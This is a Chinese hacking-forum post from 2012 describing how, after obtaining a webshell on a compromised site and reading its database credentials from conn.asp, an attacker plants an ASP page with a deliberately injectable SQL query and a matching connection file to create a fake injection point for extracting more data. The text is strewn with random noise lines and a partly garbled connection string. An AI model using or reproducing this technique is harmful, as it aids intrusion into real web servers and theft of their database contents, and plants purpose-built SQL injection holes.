中国网络渗透测试联盟
标题:
自己构造注入点方便入侵
[打印本页]
作者:
admin
时间:
2012-9-13 17:27
标题:
自己构造注入点方便入侵
自己构造注入点方便入侵
+ ^( C9 q8 C h g, F5 b3 C4 d
; o# W' T1 H( y7 ^
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
5 Z; b3 _' O" A& ~) B- i. b
; U" C5 T4 A3 _7 ^+ V( Z1 K
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
5 ^6 d3 I1 e- m+ K0 p! L P; L
% I ~ r" c! @4 |1 q& ^/ q
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
) J2 G5 V' f6 ?: E$ g
! I0 r. _# R; F( m
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
+ ~( `" E2 B/ U# U5 B/ t
7 P _, R r. G v9 w9 w* T4 C# e
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
3 e N! o9 F t* Y, Z
% f! ^6 v' a+ e0 o
程序代码
8 n) P; B9 s( O" S
<!--#include file="xx.asp"-->
8 Z: d) p8 U/ |; {! x' u" T
<%
+ _3 d( g4 e. I8 L$ E' S8 j) H
set rs=server.createobject("ADODB.recordset")
" ~" _0 L+ l) ^& m
id = request("id")
0 m5 {1 T# b9 V
strSQL = "select * from admin where id=" & id
3 c& m2 ~( J2 S& S& p# z( Y; T$ w
rs.open strSQL,conn,1,3
+ i1 Z; b# c# C4 F0 a5 W
rs.close
) z% J" F6 V$ F* @
%>
6 G' J; H! j( X$ }
, o& }' k C% v9 L4 H7 m
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
% ~( K) ?+ L; [5 U, J5 Z8 i
3 `4 l; C1 ?) t3 ]% T2 Z" L& g
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
0 L; U8 Z7 L" h! _7 h$ V# K
' y' T0 [" u& m9 c" v
然后就要构造一个连接数据库的文件了,代码如下:
# E6 O* b( `3 i8 _5 t
程序代码
8 A/ ^; _9 ^- C# }
<%
: X0 o- T4 X3 q0 S: y. d& A7 H
strSQLServerName = "000.000.000.000" '服务器名称或地址
2 W1 w0 c0 [, u# _ T) Y, ?& A
strSQLDBUserName = "sqlname" '数据库帐号
! e! t! Q/ {! d* l- `- E! y
strSQLDBPassword = "sqlpass" '数据库密码
, i9 H+ I. `2 T6 M
strSQLDBName = "sqldataname" '数据库名称
6 m- C6 p. a4 x9 P
Set conn = Server.CreateObject("ADODB.Connection")
) e1 i1 F- {' ~
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
" Y: o Z) G4 n& m
conn.open strCon
/ v( l V( E- m' Z# z* t3 ~' e
%>
) q3 W1 d7 N% `* e' m
% J* }6 ]6 ]8 k: t, z9 @
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
# U2 U2 n& ]" V9 ?
2 b' {: l8 B8 a* Q& ` V
就这样,正常情况下,就OK了,伪造成功……
+ b3 a. o5 U. `. K4 c
9 Y* p& P! `3 X1 ?5 Z
如果有什么问题可以提出来大家一起探讨解决。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2